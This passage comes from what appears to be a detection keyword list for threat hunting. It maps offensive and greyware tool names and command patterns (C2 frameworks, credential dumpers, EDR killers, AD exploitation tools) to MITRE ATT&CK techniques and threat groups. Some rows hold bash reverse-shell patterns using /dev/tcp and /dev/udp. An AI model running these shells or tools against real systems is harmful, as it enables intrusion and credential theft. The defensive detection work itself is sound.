T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1051,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z 
-*seventeenman/CallBackDump*,offensive_tool_keyword,cobaltstrike,dump lsass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/seventeenman/CallBackDump,1,1,N/A,10,10,510,74,2023-07-20T09:03:33Z,2022-09-25T08:29:14Z -*sfp_portscan_tcp.py*,offensive_tool_keyword,spiderfoot,The OSINT Platform for Security Assessments,T1595 - T1595.002 - T1596 - T1591 - T1591.002,TA0043 ,N/A,N/A,Information Gathering,https://www.spiderfoot.net/,1,1,N/A,6,10,N/A,N/A,N/A,N/A -*sfp_torexits.py*,offensive_tool_keyword,spiderfoot,The OSINT Platform for Security Assessments,T1595 - T1595.002 - T1596 - T1591 - T1591.002,TA0043 ,N/A,N/A,Information Gathering,https://www.spiderfoot.net/,1,0,N/A,6,10,N/A,N/A,N/A,N/A -*sftp *@*:* *,greyware_tool_keyword,sftp,Detects the use of tools that copy files from or to remote systems,T1041 - T1105 - T1106,TA0002 - TA0008 - TA0010,N/A,N/A,Data Exfiltration,https://attack.mitre.org/techniques/T1105/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*sh >/dev/tcp/* <&1 2>&1*,greyware_tool_keyword,bash,Equation 
Group reverse shell method - simple bash reverse shell,T1105 - T1021.001 - T1021.002,TA0002 - TA0008,N/A,N/A,shell spawning,https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md,1,0,greyware tool - risks of False positive !,N/A,10,51169,13280,2023-10-02T15:13:46Z,2016-10-18T07:29:07Z -*sh -c *ping -c 2 %s grep %s /proc/net/arp >/tmp/gx *,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*,T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Shell spawning,https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386,1,0,N/A,N/A,10,4011,2166,2017-05-24T21:12:59Z,2017-04-08T14:03:59Z -*sh -i >& /dev/udp/*/* 0>&1*,greyware_tool_keyword,bash,bash reverse shell ,T1105 - T1021.001 - T1021.002,TA0002 - TA0008,N/A,N/A,shell spawning,https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md,1,0,greyware tool - risks of False positive !,N/A,10,51169,13280,2023-10-02T15:13:46Z,2016-10-18T07:29:07Z -*Sha-2-*512.unverified.test-vectors.txt*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*Sha-2-256.unverified.test-vectors.txt*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*Sha-2-384.unverified.test-vectors.txt*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z 
-*shadawck/glit*,offensive_tool_keyword,glit,Retrieve all mails of users related to a git repository a git user or a git organization,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/glit,1,1,N/A,8,1,34,6,2022-11-28T20:42:23Z,2022-11-14T11:25:10Z -*shadawck/nse-install*,greyware_tool_keyword,nmap,Install and update external NSE script for nmap,T1046 - T1059.001 - T1027.002,TA0007 - TA0005,N/A,N/A,Vulnerability Scanner,https://github.com/shadawck/nse-install,1,1,N/A,7,1,3,1,2020-08-28T11:27:08Z,2020-08-24T16:55:55Z -*shadawck/recon-archy*,offensive_tool_keyword,recon-archy,Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/recon-archy,1,0,N/A,7,1,12,1,2020-08-04T11:26:42Z,2020-06-25T14:38:51Z -*shadow_copy.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*shadowclock*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*shadowclone *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*shadowcoerce.py *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*shadowcoerce_check*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 
- TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*shadowcopy enum*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*shadowdump.*,offensive_tool_keyword,deimosc2,DeimosC2 is a Golang command and control framework for post-exploitation.,T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007,TA0011,N/A,N/A,C2,https://github.com/DeimosC2/DeimosC2,1,1,N/A,10,10,1004,158,2023-07-15T05:34:10Z,2020-06-30T19:24:13Z -*ShadowForge.py*,offensive_tool_keyword,ShadowForgeC2,ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.,T1071.001 - T1569.002 - T1059.001,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/0xEr3bus/ShadowForgeC2,1,1,N/A,10,10,35,5,2023-07-15T11:45:36Z,2023-07-13T11:49:36Z -*ShadowForgeC2-main*,offensive_tool_keyword,ShadowForgeC2,ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.,T1071.001 - T1569.002 - T1059.001,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/0xEr3bus/ShadowForgeC2,1,1,N/A,10,10,35,5,2023-07-15T11:45:36Z,2023-07-13T11:49:36Z -*ShadowSpray recovered*,offensive_tool_keyword,ShadowSpray,A tool to spray Shadow Credentials across an entire domain 
in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.,T1110.003 - T1098 - T1059 - T1075,TA0001 - TA0008 - TA0009,N/A,N/A,Discovery,https://github.com/ShorSec/ShadowSpray,1,0,N/A,7,5,408,72,2022-10-14T13:36:51Z,2022-10-10T08:34:07Z -*ShadowSpray.Asn1*,offensive_tool_keyword,ShadowSpray,A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.,T1110.003 - T1098 - T1059 - T1075,TA0001 - TA0008 - TA0009,N/A,N/A,Discovery,https://github.com/ShorSec/ShadowSpray,1,1,N/A,7,5,408,72,2022-10-14T13:36:51Z,2022-10-10T08:34:07Z -*ShadowSpray.exe*,offensive_tool_keyword,ShadowSpray,A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.,T1110.003 - T1098 - T1059 - T1075,TA0001 - TA0008 - TA0009,N/A,N/A,Discovery,https://github.com/ShorSec/ShadowSpray,1,1,N/A,7,5,408,72,2022-10-14T13:36:51Z,2022-10-10T08:34:07Z -*ShadowSpray.Kerb*,offensive_tool_keyword,ShadowSpray,A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.,T1110.003 - T1098 - T1059 - T1075,TA0001 - TA0008 - TA0009,N/A,N/A,Discovery,https://github.com/ShorSec/ShadowSpray,1,0,N/A,7,5,408,72,2022-10-14T13:36:51Z,2022-10-10T08:34:07Z -*ShadowSpray.sln*,offensive_tool_keyword,ShadowSpray,A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.,T1110.003 - T1098 - T1059 - T1075,TA0001 - TA0008 - TA0009,N/A,N/A,Discovery,https://github.com/ShorSec/ShadowSpray,1,1,N/A,7,5,408,72,2022-10-14T13:36:51Z,2022-10-10T08:34:07Z -*ShadowSpray-master*,offensive_tool_keyword,ShadowSpray,A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten 
GenericWrite/GenericAll DACLs over other objects in the domain.,T1110.003 - T1098 - T1059 - T1075,TA0001 - TA0008 - TA0009,N/A,N/A,Discovery,https://github.com/ShorSec/ShadowSpray,1,1,N/A,7,5,408,72,2022-10-14T13:36:51Z,2022-10-10T08:34:07Z -*ShadowUser/scvhost.exe*,offensive_tool_keyword,cobaltstrike,A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/yanghaoi/CobaltStrike_CNA,1,1,N/A,10,10,402,78,2022-01-18T12:47:55Z,2021-04-21T13:10:11Z -*shareenum.py*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*shareenumeration*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - 
TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*SharepointExploiter.ps1*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*SharepointSiteExploiter.ps1*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*Shares/cme_spider_plus*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*Shares/finduncshar_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation 
Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*sharkd -a tcp:*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*Sharp Compile*,offensive_tool_keyword,cobaltstrike,SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/SpiderLabs/SharpCompile,1,0,N/A,10,10,289,63,2020-08-07T12:49:36Z,2018-11-01T17:18:52Z -*Sharp_v4_x64*.bin*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with 
post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Sharp_v4_x86*.bin*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*sharpadidnsdump.*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpAdidnsdumpManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpAdidnsdumpMenu*,offensive_tool_keyword,RedPeanut,RedPeanut is a small 
RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpAllowedToAct.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*sharpapplocker*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*SharpAppLocker.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpAzbelt-main*,offensive_tool_keyword,SharpAzbelt,This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources,T1082 - T1003 - T1027 - T1110 - T1078,TA0006 - TA0007 - TA0005 - TA0004 - TA0003,N/A,N/A,Discovery - Collection,https://github.com/redskal/SharpAzbelt,1,1,N/A,8,1,23,6,2023-09-21T21:47:32Z,2023-09-21T21:44:03Z -*SharpBlackout* -p *,offensive_tool_keyword,SharpBlackout,Terminate AV/EDR leveraging BYOVD attack,T1562.001 - T1050.005,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/dmcxblue/SharpBlackout,1,0,N/A,10,1,68,16,2023-08-23T14:44:25Z,2023-08-23T14:16:40Z -*SharpBlackOut.csproj*,offensive_tool_keyword,SharpBlackout,Terminate AV/EDR leveraging BYOVD attack,T1562.001 - T1050.005,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/dmcxblue/SharpBlackout,1,1,N/A,10,1,68,16,2023-08-23T14:44:25Z,2023-08-23T14:16:40Z -*SharpBlackout.exe*,offensive_tool_keyword,SharpBlackout,Terminate AV/EDR leveraging BYOVD attack,T1562.001 - T1050.005,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/dmcxblue/SharpBlackout,1,1,N/A,10,1,68,16,2023-08-23T14:44:25Z,2023-08-23T14:16:40Z -*SharpBlackOut.pdb*,offensive_tool_keyword,SharpBlackout,Terminate AV/EDR leveraging BYOVD attack,T1562.001 - T1050.005,TA0005 - TA0003,N/A,N/A,Defense 
Evasion,https://github.com/dmcxblue/SharpBlackout,1,1,N/A,10,1,68,16,2023-08-23T14:44:25Z,2023-08-23T14:16:40Z -*SharpBlackOut.sln*,offensive_tool_keyword,SharpBlackout,Terminate AV/EDR leveraging BYOVD attack,T1562.001 - T1050.005,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/dmcxblue/SharpBlackout,1,1,N/A,10,1,68,16,2023-08-23T14:44:25Z,2023-08-23T14:16:40Z -*SharpBlackout-main*,offensive_tool_keyword,SharpBlackout,Terminate AV/EDR leveraging BYOVD attack,T1562.001 - T1050.005,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/dmcxblue/SharpBlackout,1,1,N/A,10,1,68,16,2023-08-23T14:44:25Z,2023-08-23T14:16:40Z -*SharpBlock -*,offensive_tool_keyword,SharpBlock,A method of bypassing EDR active projection DLL by preventing entry point exection,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/CCob/SharpBlock,1,0,N/A,10,10,975,147,2021-03-31T09:44:48Z,2020-06-14T10:32:16Z -*SharpBlock.csproj*,offensive_tool_keyword,SharpBlock,A method of bypassing EDR active projection DLL by preventing entry point exection,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/CCob/SharpBlock,1,1,N/A,10,10,975,147,2021-03-31T09:44:48Z,2020-06-14T10:32:16Z -*SharpBlock.exe*,offensive_tool_keyword,SharpBlock,A method of bypassing EDR active projection DLL by preventing entry point exection,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/CCob/SharpBlock,1,1,N/A,10,10,975,147,2021-03-31T09:44:48Z,2020-06-14T10:32:16Z -*SharpBlock.sln*,offensive_tool_keyword,SharpBlock,A method of bypassing EDR active projection DLL by preventing entry point exection,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/CCob/SharpBlock,1,1,N/A,10,10,975,147,2021-03-31T09:44:48Z,2020-06-14T10:32:16Z -*SharpBypassUAC*,offensive_tool_keyword,AD exploitation cheat sheet,Use SharpBypassUAC e.g. 
from a CobaltStrike beacon,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*SharpBypassUAC.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation 